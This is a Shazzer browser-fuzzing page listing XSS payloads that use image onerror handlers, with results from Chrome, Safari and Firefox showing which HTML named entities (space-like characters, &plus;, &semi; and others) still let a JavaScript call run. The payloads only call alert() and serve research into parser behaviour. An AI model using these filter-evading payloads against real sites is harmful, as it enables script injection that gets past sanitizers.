Shazzer logo

    Entities allowed before function calls

    This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

    Created by: hackvertor

    Created on: 7/2/2024, 11:22:28 AM

    Updated on: 7/4/2024, 8:39:28 PM

    Vector type: XSS

    Template used:
    <img src=data: onerror="$[data1]log('html($[data1])')">
    Your browser was detected as:
    Detecting... Detecting... Detecting... Detecting...

    Sample payloads

    <img src=data: onerror="&puncsp;alert('&#38;puncsp;')">
    <img src=data: onerror="&ensp;alert('&#38;ensp;')">
    <img src=data: onerror="&Tab;alert('&#38;Tab;')">
    <img src=data: onerror="&emsp;alert('&#38;emsp;')">
    <img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">
    <img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">
    <img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">
    <img src=data: onerror="&emsp13;alert('&#38;emsp13;')">
    <img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">
    <img src=data: onerror="&plus;alert('&#38;plus;')">
    <img src=data: onerror="&semi;alert('&#38;semi;')">
    <img src=data: onerror="&nbsp;alert('&#38;nbsp;')">
    <img src=data: onerror="&NewLine;alert('&#38;NewLine;')">
    <img src=data: onerror="&emsp14;alert('&#38;emsp14;')">
    <img src=data: onerror="&excl;alert('&#38;excl;')">
    <img src=data: onerror="&hairsp;alert('&#38;hairsp;')">
    <img src=data: onerror="&numsp;alert('&#38;numsp;')">
    <img src=data: onerror="&thinsp;alert('&#38;thinsp;')">
    <img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">
    <img src=data: onerror="&numsp;alert('&#38;numsp;')">
    <img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">
    <img src=data: onerror="&excl;alert('&#38;excl;')">
    <img src=data: onerror="&semi;alert('&#38;semi;')">
    <img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">
    <img src=data: onerror="&hairsp;alert('&#38;hairsp;')">
    <img src=data: onerror="&emsp14;alert('&#38;emsp14;')">
    <img src=data: onerror="&emsp13;alert('&#38;emsp13;')">
    <img src=data: onerror="&nbsp;alert('&#38;nbsp;')">
    <img src=data: onerror="&NewLine;alert('&#38;NewLine;')">
    <img src=data: onerror="&plus;alert('&#38;plus;')">
    <img src=data: onerror="&Tab;alert('&#38;Tab;')">
    <img src=data: onerror="&ensp;alert('&#38;ensp;')">
    <img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">
    <img src=data: onerror="&emsp;alert('&#38;emsp;')">
    <img src=data: onerror="&thinsp;alert('&#38;thinsp;')">
    <img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">
    <img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">
    <img src=data: onerror="&puncsp;alert('&#38;puncsp;')">
    <img src=data: onerror="&emsp13;alert('&#38;emsp13;')">
    <img src=data: onerror="&emsp14;alert('&#38;emsp14;')">
    <img src=data: onerror="&emsp;alert('&#38;emsp;')">
    <img src=data: onerror="&ensp;alert('&#38;ensp;')">
    <img src=data: onerror="&excl;alert('&#38;excl;')">
    <img src=data: onerror="&hairsp;alert('&#38;hairsp;')">
    <img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">
    <img src=data: onerror="&nbsp;alert('&#38;nbsp;')">
    <img src=data: onerror="&NewLine;alert('&#38;NewLine;')">
    <img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">
    <img src=data: onerror="&numsp;alert('&#38;numsp;')">
    <img src=data: onerror="&plus;alert('&#38;plus;')">
    <img src=data: onerror="&puncsp;alert('&#38;puncsp;')">
    <img src=data: onerror="&semi;alert('&#38;semi;')">
    <img src=data: onerror="&Tab;alert('&#38;Tab;')">
    <img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">
    <img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">
    <img src=data: onerror="&thinsp;alert('&#38;thinsp;')">
    <img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">

    Fuzz results

    Chrome logo
    Chrome 126.0.0.0 desktop macOS 10.15.7
    Found 19 results
    Data
    &emsp;
    Data
    &emsp13;
    Data
    &emsp14;
    Data
    &ensp;
    Data
    &excl;
    Data
    &hairsp;
    Data
    &MediumSpace;
    Data
    &nbsp;
    Data
    &NewLine;
    Data
    &NonBreakingSpace;
    Data
    &numsp;
    Data
    &plus;
    Data
    &puncsp;
    Data
    &semi;
    Data
    &Tab;
    Data
    &ThickSpace;
    Data
    &thinsp;
    Data
    &ThinSpace;
    Data
    &VeryThinSpace;
    Safari logo
    Safari 18.0 desktop macOS 10.15.7
    Found 19 results
    Data
    &emsp;
    Data
    &emsp13;
    Data
    &emsp14;
    Data
    &ensp;
    Data
    &excl;
    Data
    &hairsp;
    Data
    &MediumSpace;
    Data
    &nbsp;
    Data
    &NewLine;
    Data
    &NonBreakingSpace;
    Data
    &numsp;
    Data
    &plus;
    Data
    &puncsp;
    Data
    &semi;
    Data
    &Tab;
    Data
    &ThickSpace;
    Data
    &thinsp;
    Data
    &ThinSpace;
    Data
    &VeryThinSpace;
    Firefox logo
    Firefox 127.0 desktop macOS 10.15
    Found 19 results
    Data
    &emsp;
    Data
    &emsp13;
    Data
    &emsp14;
    Data
    &ensp;
    Data
    &excl;
    Data
    &hairsp;
    Data
    &MediumSpace;
    Data
    &nbsp;
    Data
    &NewLine;
    Data
    &NonBreakingSpace;
    Data
    &numsp;
    Data
    &plus;
    Data
    &puncsp;
    Data
    &semi;
    Data
    &Tab;
    Data
    &ThickSpace;
    Data
    &thinsp;
    Data
    &ThinSpace;
    Data
    &VeryThinSpace;